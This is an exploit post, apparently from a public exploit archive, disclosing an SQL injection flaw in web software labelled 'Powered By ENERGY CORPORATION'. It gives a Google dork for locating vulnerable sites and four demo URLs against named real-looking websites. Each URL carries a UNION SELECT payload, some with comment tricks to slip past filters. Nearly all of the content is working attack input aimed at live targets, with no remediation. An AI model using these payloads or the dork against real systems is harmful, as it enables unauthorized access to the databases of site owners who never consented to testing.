*********************************************************
#Exploit Title: ENERGY CORPORATION Sql Injection Vulnerability
#Date: 2021-05-10
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered By ENERGY CORPORATION"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Powered By ENERGY CORPORATION"
### Demo :
http://www.petronovo.com/subService.php?id=26%20union%20select%201,2,3,4,version(),6--
https://www.sphinx-shipping.com/news.php?id=-15+/*!50000UNION*/%20/*!50000SELECT*/%201,version(),3,4,5,6,7,8,9,10--
http://www.fairtranslogistics.com/newsDetails.php?id=7%20%23AAAAAAAAAAA%0Aunion%20%23AAAAAAA%0Aselect%201,version(),3,4,5,6,7--
http://eptspill.com/services.php?id=28%20union%20select%201,version(),3,4,5,6--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************